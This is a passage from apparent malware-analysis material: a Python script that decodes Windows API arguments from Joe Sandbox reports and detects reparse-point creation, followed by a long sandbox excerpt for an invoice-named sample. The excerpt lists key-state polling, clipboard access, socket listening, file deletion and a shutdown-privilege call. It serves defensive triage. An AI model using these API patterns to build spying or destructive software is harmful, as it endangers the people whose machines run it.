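           0x40000000: "GENERIC_WRITE", 0x80000000: "GENERIC_READ"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FLAGS_ATTRS = {0x00000001: "FILE_ATTRIBUTE_READONLY", 0x00000002: "FILE_ATTRIBUTE_HIDDEN",
               0x00000004: "FILE_ATTRIBUTE_SYSTEM", 0x00000080: "FILE_ATTRIBUTE_NORMAL",
               0x00000100: "FILE_ATTRIBUTE_TEMPORARY", 0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
               0x02000000: "FILE_FLAG_BACKUP_SEMANTICS", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
               0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN", 0x20000000: "FILE_FLAG_NO_BUFFERING",
               0x40000000: "FILE_FLAG_OVERLAPPED", 0x80000000: "FILE_FLAG_WRITE_THROUGH"}
VK = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN", 0x5C: "VK_RWIN",
      0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0xA2: "VK_LCONTROL", 0xA3: "VK_RCONTROL",
      0xA4: "VK_LMENU", 0xA5: "VK_RMENU"}


def _flags(value, table):
    """Expand a bitmask into names, lowest bit first; unknown leftover bits stay as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(f"0x{rest:08X}")
    return "|".join(names) or "0"


def decode_ioctl(code):
    """Split a DeviceIoControl code into its CTL_CODE fields and name it if known."""
    return {"name": KNOWN_IOCTL.get(code, f"0x{code:08X}"),
            "device": IOCTL_DEVICE.get((code >> 16) & 0xFFFF, f"0x{(code >> 16) & 0xFFFF:X}"),
            "access": IOCTL_ACCESS[(code >> 14) & 0x3],
            "function": (code >> 2) & 0xFFF,
            "method": IOCTL_METHOD[code & 0x3]}


def _arg(raw):
    """Joe Sandbox prints resolved arguments as 8 hex digits and unknown ones as '?'."""
    raw = raw.strip()
    return int(raw, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", raw) else raw


def decode_api_line(line):
    """Parse one 'Api.MODULE(args), ref: addr' line; returns None for non-API lines."""
    m = API_LINE.search(line)
    if not m:
        return None
    api, args = m["api"], [_arg(a) for a in m["args"].split(",")]
    rec = {"api": api, "module": m["module"], "ref": m["ref"], "args": args, "decoded": {}}

    def is_int(i):
        return i < len(args) and isinstance(args[i], int)

    dec = rec["decoded"]
    if api == "DeviceIoControl" and is_int(1):
        dec.update(decode_ioctl(args[1]))
    elif api == "CreateFileW":  # (name, access, share, sa, disposition, flags, template)
        if is_int(1): dec["access"] = _flags(args[1], GENERIC)
        if is_int(2): dec["share"] = _flags(args[2], SHARE)
        if is_int(4): dec["disposition"] = DISPOSITION.get(args[4], f"0x{args[4]:X}")
        if is_int(5): dec["flags"] = _flags(args[5], FLAGS_ATTRS)
    elif api in ("GetAsyncKeyState", "GetKeyState") and is_int(0):
        dec["vkey"] = VK.get(args[0], f"0x{args[0]:02X}")
    return rec


def triage(lines):
    return [r for r in (decode_api_line(l) for l in lines) if r]


def sets_reparse_point(records):
    """True when a handle opened with OPEN_REPARSE_POINT|BACKUP_SEMANTICS is later
    followed by FSCTL_SET_REPARSE_POINT: the canonical junction/symlink creation pattern."""
    needed = {"FILE_FLAG_OPEN_REPARSE_POINT", "FILE_FLAG_BACKUP_SEMANTICS"}
    opened = False
    for r in records:
        d = r["decoded"]
        if r["api"] == "CreateFileW" and needed <= set(d.get("flags", "").split("|")):
            opened = True
        elif r["api"] == "DeviceIoControl" and opened and d.get("name") == "FSCTL_SET_REPARSE_POINT":
            return True
    return False


# Lines copied verbatim from the function listings in this report (constructed sample input).
REPORT_LINES = [
    "• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0046A20F",
    "• CreateDirectoryW.KERNEL32(?,00000000), ref: 0046A26E",
    "• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0046A293",
    "• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0046A323",
    "• RemoveDirectoryW.KERNEL32(?), ref: 0046A337",
    "• GetAsyncKeyState.USER32(000000A0), ref: 00460122",
    "• GetAsyncKeyState.USER32(0000005B), ref: 00460213",
    "  • Part of subcall function 00464385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004643A0",
]

if __name__ == "__main__":
    recs = triage(REPORT_LINES)
    for r in recs:
        print(f"{r['ref']} {r['api']:<18} {r['decoded']}")
    print("reparse-point creation sequence:", sets_reparse_point(recs))
```

Run it on a whole "APIs" section pasted from the report and grep the output for FSCTL_ names and FILE_FLAG_OPEN_REPARSE_POINT; the second CreateFileW line (flags 02000080) decodes to FILE_ATTRIBUTE_NORMAL|FILE_FLAG_BACKUP_SEMANTICS with FILE_SHARE_READ, which is an ordinary write-open and does not trigger the reparse-point check.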
                                          APIs
                                            • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004804AC
                                            • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                            • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0048054B
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004805E3
                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00480822
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0048082F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                          • String ID:
                                          • API String ID: 1240663315-0
                                          • Opcode ID: eabf8d680dfe3cfd2204718e86051aa88e9542fed0f6c3d8dda5e7a0bc609bf0
                                          • Instruction ID: efbac3d2c4afa975f371ae5d5fee671ec22ce1fa5a9a6cb729be810612663562
                                          • Opcode Fuzzy Hash: eabf8d680dfe3cfd2204718e86051aa88e9542fed0f6c3d8dda5e7a0bc609bf0
                                          • Instruction Fuzzy Hash: A5E16E71614200AFCB54EF25C891D2FBBE4EF89314B04896EF84ADB3A2D634ED45CB56
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                          • String ID:
                                          • API String ID: 1737998785-0
                                          • Opcode ID: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                                          • Instruction ID: 6a8dd1f95291b63ae5b16d2a5a0d869dcb5166510358231783c1e180ef80644f
                                          • Opcode Fuzzy Hash: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                                          • Instruction Fuzzy Hash: CE2191352002109FDB00AF54EC09B6E7BA8EF44751F10847AF945E72A2EB38AC05CB5D
                                          APIs
                                            • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                            • Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32
                                          • FindFirstFileW.KERNEL32(?,?), ref: 004638A3
                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0046394B
                                          • MoveFileW.KERNEL32(?,?), ref: 0046395E
                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0046397B
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046399D
                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 004639B9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                          • String ID: \*.*
                                          • API String ID: 4002782344-1173974218
                                          • Opcode ID: e41a741f13836c122e1a93b35399af2899a1ae988daff58317c02930b9991c4e
                                          • Instruction ID: 5f3270bf9419f81a9c4f0e0ab399985bb250d256c3569b2459e2ec67edc6ab47
                                          • Opcode Fuzzy Hash: e41a741f13836c122e1a93b35399af2899a1ae988daff58317c02930b9991c4e
                                          • Instruction Fuzzy Hash: 5551717180514CAACF05EFA1C9929EEB778AF14319F60047EE40277191EB396F0DCB5A
                                          APIs
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0046F440
                                          • Sleep.KERNEL32(0000000A), ref: 0046F470
                                          • _wcscmp.LIBCMT ref: 0046F484
                                          • _wcscmp.LIBCMT ref: 0046F49F
                                          • FindNextFileW.KERNEL32(?,?), ref: 0046F53D
                                          • FindClose.KERNEL32(00000000), ref: 0046F553
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                          • String ID: *.*
                                          • API String ID: 713712311-438819550
                                          • Opcode ID: b21b5751c67d20c7492c03ab1b01f4f28f86a4b8690f8ee467c0eb4bada205d6
                                          • Instruction ID: 52678bcd3f78e7a2dee1500e624958e336d76892905c76040bb4fc6126c74c58
                                          • Opcode Fuzzy Hash: b21b5751c67d20c7492c03ab1b01f4f28f86a4b8690f8ee467c0eb4bada205d6
                                          • Instruction Fuzzy Hash: D0418D71904219AFCF10EF64DC45AEFBBB4FF04314F50446BE855A2291EB38AE88CB59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __itow__swprintf
                                          • String ID: 3cA$_A
                                          • API String ID: 674341424-3480954128
                                          • Opcode ID: 8350981069d39a37c1030e6ccff990e0f9e160ede75b231a4a1c40ae3a2eb9ee
                                          • Instruction ID: 703a96bf305cb9905ff3d3c25826e0fcfbd93ba8a00a4d78e9854e8314894fca
                                          • Opcode Fuzzy Hash: 8350981069d39a37c1030e6ccff990e0f9e160ede75b231a4a1c40ae3a2eb9ee
                                          • Instruction Fuzzy Hash: AB229B716083009FD724DF14C881BABB7E4AF85314F11492EF89A97392DB78E945CB9B
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: bc62f7b523a37f67c520ce678140ca6f872d5d6cfe4b2560a72284cb67dcae8d
                                          • Instruction ID: fe3fa380dd79410c0d4e58696af30f423fcd40af0ea7aa6f8d28fb308e13f721
                                          • Opcode Fuzzy Hash: bc62f7b523a37f67c520ce678140ca6f872d5d6cfe4b2560a72284cb67dcae8d
                                          • Instruction Fuzzy Hash: 9D12AC70A00609DFCF04DFA5D981AEEB3F5FF88304F10452AE846A7291EB39AD55CB59
                                          APIs
                                            • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                            • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                            • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                                          • ExitWindowsEx.USER32(?,00000000), ref: 004651F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                          • String ID: $@$SeShutdownPrivilege
                                          • API String ID: 2234035333-194228
                                          • Opcode ID: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                                          • Instruction ID: a9b7a44e2451b6884de2a96c8f52f71cfd0e95415fa4985b61f57267d5601e10
                                          • Opcode Fuzzy Hash: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                                          • Instruction Fuzzy Hash: D201F7317916116BF7286668ACAAFBB7358DB05345F2008BBFD03E21D2FD591C058A9F
                                          APIs
                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004762DC
                                          • WSAGetLastError.WSOCK32(00000000), ref: 004762EB
                                          • bind.WSOCK32(00000000,?,00000010), ref: 00476307
                                          • listen.WSOCK32(00000000,00000005), ref: 00476316
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00476330
                                          • closesocket.WSOCK32(00000000,00000000), ref: 00476344
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                          • String ID:
                                          • API String ID: 1279440585-0
                                          • Opcode ID: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                                          • Instruction ID: 9cc0b371228dcaf8913226d6fe42490e105b9b769aefcc5547ebbaeef9b3f94b
                                          • Opcode Fuzzy Hash: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                                          • Instruction Fuzzy Hash: 6521F2312006049FCB10FF64C845A6EB7BAEF44324F15856EEC1AA73D2C734AC05CB59
                                          APIs
                                            • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                            • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                          • _memmove.LIBCMT ref: 00450258
                                          • _memmove.LIBCMT ref: 0045036D
                                          • _memmove.LIBCMT ref: 00450414
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                          • String ID:
                                          • API String ID: 1300846289-0
                                          • Opcode ID: 77f534bd7fd64369b1f9f63b99cc074bbebc99142de360515bc227b2d532a671
                                          • Instruction ID: ce31bd404333394545349dab4fd8ad238969c684e33d592a62d2001407cdf1f6
                                          • Opcode Fuzzy Hash: 77f534bd7fd64369b1f9f63b99cc074bbebc99142de360515bc227b2d532a671
                                          • Instruction Fuzzy Hash: 3202E270A00205DBCF04DF65D9816AEBBF5EF84304F54806EE80ADB392EB39D955CB99
                                          APIs
                                            • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 004019FA
                                          • GetSysColor.USER32(0000000F), ref: 00401A4E
                                          • SetBkColor.GDI32(?,00000000), ref: 00401A61
                                            • Part of subcall function 00401290: DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ColorProc$LongWindow
                                          • String ID:
                                          • API String ID: 3744519093-0
                                          • Opcode ID: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                                          • Instruction ID: d041ec2a837aeb515327988813bafb0785b4d0a615f46c6b1421ede386c2745f
                                          • Opcode Fuzzy Hash: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                                          • Instruction Fuzzy Hash: A4A124B1202544BAE629BA694C88F7F255CDF45345F14053FF602F62F2CA3C9D429ABE
                                          APIs
                                            • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0047679E
                                          • WSAGetLastError.WSOCK32(00000000), ref: 004767C7
                                          • bind.WSOCK32(00000000,?,00000010), ref: 00476800
                                          • WSAGetLastError.WSOCK32(00000000), ref: 0047680D
                                          • closesocket.WSOCK32(00000000,00000000), ref: 00476821
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                          • String ID:
                                          • API String ID: 99427753-0
                                          • Opcode ID: c3678cbd9f04907b78b21f7c60552e65a77e2ac58af8dde8cfff1331ff6b0f68
                                          • Instruction ID: 4f4fa4b069b112be458f20050bee2991dabce79e459f6d74e9331a247e2dcb9e
                                          • Opcode Fuzzy Hash: c3678cbd9f04907b78b21f7c60552e65a77e2ac58af8dde8cfff1331ff6b0f68
                                          • Instruction Fuzzy Hash: E941D275A00600AFDB10BF258C86F6E77A89F45718F05C56EFA59BB3C3CA789D008799
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                          • String ID:
                                          • API String ID: 292994002-0
                                          • Opcode ID: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                                          • Instruction ID: 2bf7cd1b22f0a435aba1bf6783624a0e9851140f374647b9b1574053626a0f4e
                                          • Opcode Fuzzy Hash: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                                          • Instruction Fuzzy Hash: BB11B232700911ABEB217F269C44A6F7B99EF447A1B40483EFC45E3242DB789C0287AD
                                          APIs
                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 44706859-0
